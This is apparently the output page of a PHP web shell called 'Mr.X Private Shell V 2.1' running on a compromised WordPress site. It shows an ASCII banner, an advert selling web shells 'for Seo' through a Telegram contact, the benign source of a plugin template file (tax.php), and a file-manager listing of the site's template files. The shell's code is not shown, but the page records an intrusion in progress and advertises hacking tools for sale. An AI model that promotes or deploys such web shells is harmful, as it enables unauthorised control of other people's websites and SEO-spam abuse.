__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
$tax_meta_html = array();
if ( count( $tax_meta ) > 0 ) {
foreach ( $tax_meta as $tax ) {
$tax_item_html = '';
/**
* @var WP_Post $result
*/
$term_obj_list = get_the_terms( $result->ID, $tax );
$item_class = $tax === 'category' ? 'categories' : ( $tax === 'post_tag' ? 'tags' : $tax );
if ( is_array( $term_obj_list ) && ! empty( $term_obj_list ) ) {
$tax_item_html .= sprintf(
'<div class="ebpg-meta ebpg-%1$s-meta">',
$item_class
);
foreach ( $term_obj_list as $term ) {
$tax_item_html .= sprintf(
'<a href="%1$s" title="%2$s">%2$s</a>',
esc_attr( esc_url( get_term_link( $term->term_id ) ) ),
esc_html( $term->name )
);
}
$tax_item_html .= '</div>';
}
$tax_meta_html[ $tax ] = $tax_item_html;
}
}
return $tax_meta_html;
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| author.php | File | 472 B | 0640 |
|
| avatar.php | File | 629 B | 0640 |
|
| categories.php | File | 530 B | 0640 |
|
| date.php | File | 300 B | 0640 |
|
| footer.php | File | 640 B | 0640 |
|
| header.php | File | 641 B | 0640 |
|
| readtime.php | File | 486 B | 0640 |
|
| tags.php | File | 445 B | 0640 |
|
| tax.php | File | 807 B | 0640 |
|